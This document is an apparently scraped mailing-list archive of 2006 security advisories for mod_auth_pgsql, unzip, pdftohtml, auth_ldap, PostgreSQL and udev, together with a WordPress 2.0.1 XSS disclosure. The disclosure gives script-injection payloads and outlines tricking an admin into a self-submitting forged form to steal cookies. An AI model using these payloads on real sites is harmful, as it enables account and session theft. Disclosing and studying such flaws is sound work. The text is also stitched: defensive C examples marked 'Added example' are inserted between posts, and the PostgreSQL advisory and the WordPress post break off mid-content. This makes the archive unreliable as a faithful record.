[FLSA-2006:177326] Updated mod_auth_pgsql package fixes security issue

2006-02-28 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated mod_auth_pgsql package fixes security issue
Advisory ID:   FLSA:177326
Issue date:2006-02-27
Product:   Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2005-3656
-


-
1. Topic:

An updated mod_auth_pgsql package that fixes a format string flaw is now
available.

The mod_auth_pgsql package is an httpd module that allows user
authentication against information stored in a PostgreSQL database.

2. Relevant releases/architectures:

Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

Several format string flaws were found in the way mod_auth_pgsql logs
information. It may be possible for a remote attacker to execute
arbitrary code as the 'apache' user if mod_auth_pgsql is used for user
authentication. The Common Vulnerabilities and Exposures project
assigned the name CVE-2005-3656 to this issue.

Please note that this issue only affects servers which have
mod_auth_pgsql installed and configured to perform user authentication
against a PostgreSQL database.

All users of mod_auth_pgsql should upgrade to these updated packages,
which contain a backported patch to resolve this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=177326

6. RPMs required:

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/mod_auth_pgsql-2.0.1-3.1.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/mod_auth_pgsql-2.0.1-3.1.legacy.i386.rpm

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/mod_auth_pgsql-2.0.1-4.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/mod_auth_pgsql-2.0.1-4.2.legacy.i386.rpm


7. Verification:

SHA1 sum Package Name
-

e6ce19c8be5f4638e2050437c4529b0d4a0f5e1f
fedora/1/updates/i386/mod_auth_pgsql-2.0.1-3.1.legacy.i386.rpm
119b3b6045eaa3b175ebe3d613daca8e9c81b35c
fedora/1/updates/SRPMS/mod_auth_pgsql-2.0.1-3.1.legacy.src.rpm

8f9c2503b417db84b73483e6daca445c4789e4e4
fedora/2/updates/i386/mod_auth_pgsql-2.0.1-4.2.legacy.i386.rpm
52aabaff10fb0f862e1b96199facb7da046e94dc
fedora/2/updates/SRPMS/mod_auth_pgsql-2.0.1-4.2.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v filename

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

sha1sum filename

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3656

9. Contact:

The Fedora Legacy security contact is [EMAIL PROTECTED]. More
project details at http://www.fedoralegacy.org

-




[ MDKSA-2005:050 ] - Updated unzip packages fix vulnerabilities

2006-02-28 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:050
 http://www.mandriva.com/security/
 ___
 
 Package : unzip
 Date: February 27, 2005
 Affected: 10.2, 2006.0, Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 A buffer overflow was found in how unzip handles file name arguments.
 If a user could be tricked into processing a specially crafted,
 excessively long file name with unzip, an attacker could execute
 arbitrary code with the user's privileges.
 
 The updated packages have been patched to address this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4667
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.2:
 56ed53b98b79934d0f4292a4e067eae6  10.2/RPMS/unzip-5.51-1.3.102mdk.i586.rpm
 33b9f50fab728e3b3c38c6d4f4002314  10.2/SRPMS/unzip-5.51-1.3.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 4dde5ce45056867be10129f61df4  x86_64/10.2/RPMS/unzip-5.51-1.3.102mdk.x86_64.rpm
 33b9f50fab728e3b3c38c6d4f4002314  x86_64/10.2/SRPMS/unzip-5.51-1.3.102mdk.src.rpm

 Mandriva Linux 2006.0:
 3d3dcc95fccacd8033c452774994da1e  2006.0/RPMS/unzip-5.52-1.3.20060mdk.i586.rpm
 d45d6caaf656e5f04ce934a61a48a3e6  2006.0/SRPMS/unzip-5.52-1.3.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 b73080d55771a4a9572d9879b55db012  x86_64/2006.0/RPMS/unzip-5.52-1.3.20060mdk.x86_64.rpm
 d45d6caaf656e5f04ce934a61a48a3e6  x86_64/2006.0/SRPMS/unzip-5.52-1.3.20060mdk.src.rpm

 Corporate 3.0:
 9ebf9de576ed5f9ca73362e7bea27849  corporate/3.0/RPMS/unzip-5.50-9.3.C30mdk.i586.rpm
 f3693c4ebec532b5a86f382981c81a4c  corporate/3.0/SRPMS/unzip-5.50-9.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 adce6e507a360b3132ec83f038d44bd7  x86_64/corporate/3.0/RPMS/unzip-5.50-9.3.C30mdk.x86_64.rpm
 f3693c4ebec532b5a86f382981c81a4c  x86_64/corporate/3.0/SRPMS/unzip-5.50-9.3.C30mdk.src.rpm

 Multi Network Firewall 2.0:
 075d5b7cefc2a93053e48dde5adb09ee  mnf/2.0/RPMS/unzip-5.50-9.3.M20mdk.i586.rpm
 12e0a95ab72239096c9110f8a1f98661  mnf/2.0/SRPMS/unzip-5.50-9.3.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFEA6BNmqjQ0CJFipgRAoJjAJ9UN4JOLy01p4Q7EEFd00qZLscJewCgmd0S
V/F+PgbvOJAUXE2mu9eDfKs=
=sIYU
-----END PGP SIGNATURE-----



[SECURITY] [DSA 983-1] New pdftohtml packages fix several vulnerabilities

2006-02-28 Thread Martin Schulze
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --
Debian Security Advisory DSA 983-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 28th, 2006 http://www.debian.org/security/faq
- --

Package: pdftohtml
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no

Derek Noonburg has fixed several potential vulnerabilities in xpdf,
which are also present in pdftohtml, a utility that translates PDF
documents into HTML format.

The old stable distribution (woody) does not contain pdftohtml packages.

For the stable distribution (sarge) these problems have been fixed in
version 0.36-11sarge2.

For the unstable distribution (sid) these problems have been fixed in
version 0.36-12.

We recommend that you upgrade your gpdf package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2.dsc
  Size/MD5 checksum:  602 8dc87f9f04bf4e95d628a81540b5320e

http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2.diff.gz
  Size/MD5 checksum:11953 aa4fe47eeec4ff81df92aab8f218f1f1

http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36.orig.tar.gz
  Size/MD5 checksum:   300922 75ad095bb51e1f66c9f7691e6af12f44

  Alpha architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_alpha.deb
  Size/MD5 checksum:   314142 b5bd8a038769a31b74bc9baf7498

  AMD64 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_amd64.deb
  Size/MD5 checksum:   259728 a16f018455f8e3409399f9123af3c17a

  ARM architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_arm.deb
  Size/MD5 checksum:   266500 bbf302ca14ddad34769b0b8a5822d139

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_i386.deb
  Size/MD5 checksum:   253988 fd6e84484e62b90ff4eb419bdff63044

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_ia64.deb
  Size/MD5 checksum:   374206 900ea16bffd41ff59272bab4e89077a9

  HP Precision architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_hppa.deb
  Size/MD5 checksum:   330356 4bf2182b3dc9f1269efb039c07fceea3

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_m68k.deb
  Size/MD5 checksum:   234812 34eb54fb6c07676aee15a9cc15110c28

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_mips.deb
  Size/MD5 checksum:   311482 2540b6b4c0b523087a40fb4ef7b57c46

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_mipsel.deb
  Size/MD5 checksum:   307188 16034038f8c3c206623702c4b3695b69

  PowerPC architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_powerpc.deb
  Size/MD5 checksum:   269634 4053b1c0d6c76ca5c94ee97df412b5e5

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_s390.deb
  Size/MD5 checksum:   242482 ff9f29460ad1cb56b4c92dfd3e1e2d57

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_sparc.deb
  Size/MD5 checksum:   245378 d1ecf4c546240dab174947827b01766e


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFEBCZ5W5ql+IAeqTIRAhc3AJ98FvheYHaNnpIW4lCYjqsVD0JDmQCeO54D
8x13RBAhHVkh9GvAHmI7Sx8=
=KfUo
-----END PGP SIGNATURE-----



[FLSA-2006:177694] Updated auth_ldap package fixes security issue

2006-02-28 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated auth_ldap package fixes security issue
Advisory ID:   FLSA:177694
Issue date:2006-02-27
Product:   Red Hat Linux
Keywords:  Bugfix
CVE Names: CVE-2006-0150
-


-
1. Topic:

An updated auth_ldap package that fixes a format string security issue
is now available for Red Hat Linux 7.3.

The auth_ldap package is an httpd module that allows user authentication
against information stored in an LDAP database.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386

3. Problem description:

A format string flaw was found in the way auth_ldap logs information. It
may be possible for a remote attacker to execute arbitrary code as the
'apache' user if auth_ldap is used for user authentication. The Common
Vulnerabilities and Exposures project (cve.mitre.org) assigned the name
CVE-2006-0150 to this issue.

Note that this issue only affects servers that have auth_ldap installed
and configured to perform user authentication against an LDAP database.

All users of auth_ldap should upgrade to this updated package, which
contains a backported patch to resolve this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=177694

6. RPMs required:

Red Hat Linux 7.3:
SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/auth_ldap-1.6.0-4.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/auth_ldap-1.6.0-4.2.legacy.i386.rpm


7. Verification:

SHA1 sum Package Name
-

38f70135bc17c313fecdb81f61e776ac032b796e
redhat/7.3/updates/i386/auth_ldap-1.6.0-4.2.legacy.i386.rpm
78b7ee876d5b900ff5268b1a396a59ca9f2385f0
redhat/7.3/updates/SRPMS/auth_ldap-1.6.0-4.2.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v filename

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

sha1sum filename

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0150

9. Contact:

The Fedora Legacy security contact is [EMAIL PROTECTED]. More
project details at http://www.fedoralegacy.org

-


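The mod_auth_pgsql (CVE-2005-3656) and auth_ldap (CVE-2006-0150) advisories above describe the same defect class: a logging call that takes attacker-influenced text (a user name from an Authorization header, an LDAP DN) as its printf-style format argument. The following is an added example, not code from either module or from Fedora Legacy: the vulnerable call shape is shown in a comment, the hardened form keeps the format constant, and two small helpers give a defender a way to flag format conversions in values that should never contain them. All function names are my own.

```c
#include <stdio.h>
#include <string.h>

/* Added example: the defect class behind the two format string advisories.
 *
 * Vulnerable call shape (kept as a comment so the example itself is sound):
 *
 *     char msg[256];
 *     snprintf(msg, sizeof msg, user);     // user is used AS the format
 *
 * Any printf-style logger has the same trap (syslog(LOG_ERR, user), or the
 * Apache ap_log_rerror family). Every '%' in the attacker-supplied text is
 * then interpreted as a conversion: %x/%s read memory into the log entry,
 * %n writes to memory. */

/* Hardened form: the format is a string literal and the untrusted text is
 * always a '%s' argument, so its '%' characters are copied verbatim.
 * Returns the number of bytes written, or -1 if the line would not fit. */
int log_auth_failure(char *out, size_t outlen, const char *module, const char *user)
{
    int n = snprintf(out, outlen, "[%s] authentication failed for user '%s'",
                     module, user);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

/* Given a pointer to '%', return the conversion character that ends the
 * specifier, or NULL for "%%" or a malformed specifier. */
static const char *spec_conversion(const char *pct)
{
    const char *p = pct + 1;
    if (*p == '%')
        return NULL;
    while (*p && strchr("-+ #0123456789.*hlLqjzt", *p))   /* flags, width, length */
        p++;
    if (*p && strchr("diouxXeEfFgGaAcspn", *p))
        return p;
    return NULL;
}

/* Detection aid: number of printf conversions in a value that should never
 * contain any (a Basic-auth user name or an LDAP DN). Non-zero counts in a
 * web server's error log are a sign the unpatched module is being probed.
 * "%%" is a literal percent sign and is not counted. */
int count_format_specs(const char *s)
{
    int count = 0;
    while ((s = strchr(s, '%')) != NULL) {
        const char *conv = spec_conversion(s);
        if (conv) { count++; s = conv + 1; }
        else if (s[1] == '%') s += 2;
        else s += 1;
    }
    return count;
}

/* Strongest signal: %n is the only conversion that writes to memory. */
int has_write_spec(const char *s)
{
    while ((s = strchr(s, '%')) != NULL) {
        const char *conv = spec_conversion(s);
        if (conv && *conv == 'n') return 1;
        if (conv) s = conv + 1;
        else if (s[1] == '%') s += 2;
        else s += 1;
    }
    return 0;
}
```

The fix in the backported patches is the one-line change from the commented form to the `"%s"` form; compiling with `-Wformat-security` makes the vulnerable shape a warning, and `-Werror=format-security` an error, which is the cheapest way to keep this class out of a module tree.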


[FLSA-2006:157366] Updated PostgreSQL packages fix security issues

2006-02-28 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated PostgreSQL packages fix security issues
Advisory ID:   FLSA:157366
Issue date:2006-02-27
Product:   Red Hat Linux, Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2005-1409 CVE-2005-1410
-


-
1. Topic:

Updated postgresql packages that fix several security vulnerabilities
and risks of data loss are now available.

PostgreSQL is an advanced Object-Relational database management system
(DBMS) that supports almost all SQL constructs (including
transactions, subselects and user-defined types and functions).

2. Relevant releases/architectures:

Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

The PostgreSQL community discovered two distinct errors in initial
system catalog entries that could allow authorized database users to
crash the database and possibly escalate their privileges. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
names CVE-2005-1409 and CVE-2005-1410 to these issues.

Although installing this update will protect new (freshly initdb'd)
database installations from these errors, administrators MUST TAKE
MANUAL ACTION to repair the errors in pre-existing databases. The
appropriate procedures are explained at
http://www.postgresql.org/docs/8.0/static/release-7-4-8.html
for Fedora Core 2 users, or
http://www.postgresql.org/docs/8.0/static/release-7-3-10.html
for Fedora Core 1 and Red Hat Linux 9 users.

This update also includes fixes for several other errors, including two
race conditions that could result in apparent data inconsistency or
actual data loss.

All users of PostgreSQL are advised to upgrade to these updated packages
and to apply the recommended manual corrections to existing databases.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=157366

6. RPMs required:

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/postgresql-7.3.10-0.90.1.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-contrib-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-devel-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-docs-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-jdbc-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-libs-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-pl-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-python-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-server-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-tcl-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-test-7.3.10-0.90.1.legacy.i386.rpm

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/postgresql-7.3.10-1.1.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-7.3.10-1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-contrib-7.3.10-1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-devel-7.3.10-1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-docs-7.3.10-1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-jdbc-7.3.10-1.1.legacy.i386.rpm

WordPress 2.0.1 Multiple Vulnerabilities

2006-02-28 Thread k4p0k4p0
/*
---
[N]eo [S]ecurity [T]eam [NST]® WordPress 2.0.1 Multiple Vulnerabilities
---
Program : WordPress 2.0
Homepage: http://www.wordpress.org
Vulnerable Versions: WordPress 2.0.1 & lower ones
Risk: Critical!
Impact: XSS, Full Path Disclosure, Directory Listing

- WordPress 2.0.1 Multiple Vulnerabilities -
---

- Description
---
WordPress is a state-of-the-art semantic personal publishing 
platform with a focus on aesthetics, web standards, and usability. 
What a mouthful. WordPress is both free and priceless at the same time.

- Tested
---
Tested in localhost & many blogs

- Bug
---
The vendor was contacted about some other coding errors that are not 
described here; the vendor was notified of these bugs when this 
advisory was published.

+ Multiple XSS +
There are multiple XSS in `post comment':

[1] The `name' variable is not filtered when it's assigned to `value'
on the `input' in the form when the comment is posted.
[2] The same as [1] happens with the `website' variable.
[3] `comment': this variable only filters the " and ' chars, which makes it 
possible to use < and >, thus permitting an attacker to inject 
any HTML (or script) code that he/she wants but without any " or ' 
character; this only happens if the user that posts the comment is 
the admin (any registered kind of `user'). 

If you (or the victim) are an unregistered user, you can use " and ' in your 
HTML/script injection using the `name' or `website' variables, but if the 
victim is the admin or a registered user, these 2 fields described above 
aren't available in the form so you cannot even give a value to them.
The only remaining option is to use the `comment' variable, but here 
we have the problem that we cannot use " or ' in the injected HTML/script and 
we have to make the admin post the comment (POST method).

+ Full path disclosure & Directory listing +
When I discovered this bug, I reported it to some people before 
public disclosure; I was notified that this isn't new and I 
decided to look into why they haven't patched this bug. 

As this bug isn't patched yet, I tried to find out why and I found 
something like this in their forum (I don't know if the person 
that posted this was the admin but it gives the explanation):
(Something like the following, it's not textual).
`... these bugs are caused by a badly configured .ini file, it's not 
a bug generated by the script so it cannot be accepted as a bug of 
WordPress...'. This is not an acceptable answer; if you think it is, 
a bug caused because register_globals is Off is the .ini's fault and not 
the script's? They have to be kidding; if they want to make good software, 
they have to go as far as the language can to prevent all bugs.

There are multiple files that don't check if they are being called 
directly. This is a problem because they expect the functions 
that the script is going to call to be declared.
This kind of bug is taken as a Low Risk bug, but it can help 
future attacks.

- Exploit
---
-- Cross Site Scripting (XSS)
PoC:
[1] Post a comment with the following values (as an unregistered user):
(No possible profit)

Name   : <script>alert("WordPress PoC from");</script>
Mail   : [EMAIL PROTECTED]
Website: <script>alert("[N]eo[S]ecurity[T]eam www.neosecurityteam.net");</script>
Comment: www.neosecurityteam.net/foro/

The injected HTML code only affects the user that posted it, not others.

[2] This way is more interesting and useful. 
In this case the injected HTML will stay on the board, affecting each person 
who sees it. 
But we have two problems:
[I ]- This comment must be posted by the admin
[II]- We can only use the `comment' field, because the admin form to make 
  the comment doesn't need the `name' or `website'.
  Also the injected code cannot have any " or ' chars.

Here are my solutions:
[I ]- We cannot give the admin a `malicious' URL to steal the cookie
  because it isn't via GET, it's via POST. So the solution is to 
  make a copy of the real form and set the default values of 
  the corresponding field (`comment') to do the stealing.
  Also make the form submit itself when the page loads. Thus, we give 
  the admin the URL of this form and he/she will post the comment 
  with the values we set before. :)
[II]- We can only use this field to make the injection; the `big' problem 
  is that we cannot use " or ' chars, which means that something like 
  window.location = "http://www.google.com.uy"; won't work.
 
Here are some real examples:

- <script>alert(document.cookie)</script>
- 
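All three findings in the post above share one root cause: a submitted value (name, website, comment) is written into HTML without encoding the characters that carry meaning there, and the comment field's quote-only filter shows why partial filtering fails (`<` and `>` still pass). The following is an added example written from the fix side, not code from the advisory or from WordPress: a full HTML encoder beside the quote-only filter the post describes, and a rendering helper for the comment-form `input` whose `value` attribute the post says was unescaped. The function names and the `<input ... name="name">` markup are my own constructions.

```c
#include <stdio.h>
#include <string.h>

/* Added example: output encoding as the fix for the reflected and stored XSS
 * described in the WordPress 2.0.1 post. Function names are mine. */

/* Encode s for safe use inside an HTML attribute value or element body:
 * the five characters that can change HTML structure become entities.
 * Writes at most outlen-1 bytes plus NUL; returns bytes written, or -1 if
 * the output would not fit (fail closed rather than emit a cut entity). */
int html_escape(const char *s, char *out, size_t outlen)
{
    size_t used = 0;
    for (; *s; s++) {
        char single[2] = { *s, '\0' };
        const char *rep;
        switch (*s) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = single;   break;
        }
        size_t n = strlen(rep);
        if (used + n + 1 > outlen)
            return -1;
        memcpy(out + used, rep, n);
        used += n;
    }
    out[used] = '\0';
    return (int)used;
}

/* The filter the post says the comment field applied: drop " and ' only.
 * Kept here for comparison; a <script> tag passes through it untouched. */
int strip_quotes_only(const char *s, char *out, size_t outlen)
{
    size_t used = 0;
    for (; *s; s++) {
        if (*s == '"' || *s == '\'')
            continue;
        if (used + 2 > outlen)
            return -1;
        out[used++] = *s;
    }
    out[used] = '\0';
    return (int)used;
}

/* Render the comment form's name field with the submitted value encoded
 * before it is placed into the value="..." attribute (constructed markup). */
int render_name_input(const char *name, char *out, size_t outlen)
{
    char esc[512];
    if (html_escape(name, esc, sizeof esc) < 0)
        return -1;
    int n = snprintf(out, outlen, "<input type=\"text\" name=\"name\" value=\"%s\">", esc);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}
```

Encoding at the point of output, rather than filtering at input, is what closes variant [3] as well: the comment text may legitimately contain `<` or `"`, but once every occurrence is an entity it can no longer terminate an attribute or open a tag, whichever user (admin or anonymous) posted it.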

[FLSA-2006:175818] Updated udev packages fix a security issue

2006-02-28 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated udev packages fix a security issue
Advisory ID:   FLSA:175818
Issue date:2006-02-27
Product:   Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2005-3631
-


-
1. Topic:

Updated udev packages that fix a security issue are now available.

The udev package contains an implementation of devfs in userspace using
sysfs and /sbin/hotplug.

2. Relevant releases/architectures:

Fedora Core 2 - i386
Fedora Core 3 - i386, x86_64

3. Problem description:

Richard Cunningham discovered a flaw in the way udev sets permissions on
various files in /dev/input. It may be possible for an authenticated
attacker to gather sensitive data entered by a user at the console, such
as passwords. The Common Vulnerabilities and Exposures project has
assigned the name CVE-2005-3631 to this issue.

All users of udev should upgrade to these updated packages, which
contain a backported patch and are not vulnerable to this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175818

6. RPMs required:

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/udev-024-6.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/udev-024-6.2.legacy.i386.rpm

Fedora Core 3:

SRPM:
http://download.fedoralegacy.org/fedora/3/updates/SRPMS/udev-039-10.FC3.9.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/3/updates/i386/udev-039-10.FC3.9.legacy.i386.rpm

x86_64:
http://download.fedoralegacy.org/fedora/3/updates/x86_64/udev-039-10.FC3.9.legacy.x86_64.rpm

7. Verification:

SHA1 sum Package Name
-

d2b2850b4066a595a4d3c162e151dc27c5b43198
fedora/2/updates/i386/udev-024-6.2.legacy.i386.rpm
9ed5ef68d64987f8f644da065399d6885e7e1176
fedora/2/updates/SRPMS/udev-024-6.2.legacy.src.rpm

a2682a89f6fe03c2f2c2401caa511c299c1ae1cc
fedora/3/updates/i386/udev-039-10.FC3.9.legacy.i386.rpm
fbcf92e15337b34511d4a305100d6797d644a84e
fedora/3/updates/x86_64/udev-039-10.FC3.9.legacy.x86_64.rpm
fe4e15a6ac3d4d80ce3db01f08a75c93985964e8
fedora/3/updates/SRPMS/udev-039-10.FC3.9.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v filename

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

sha1sum filename

8. References:

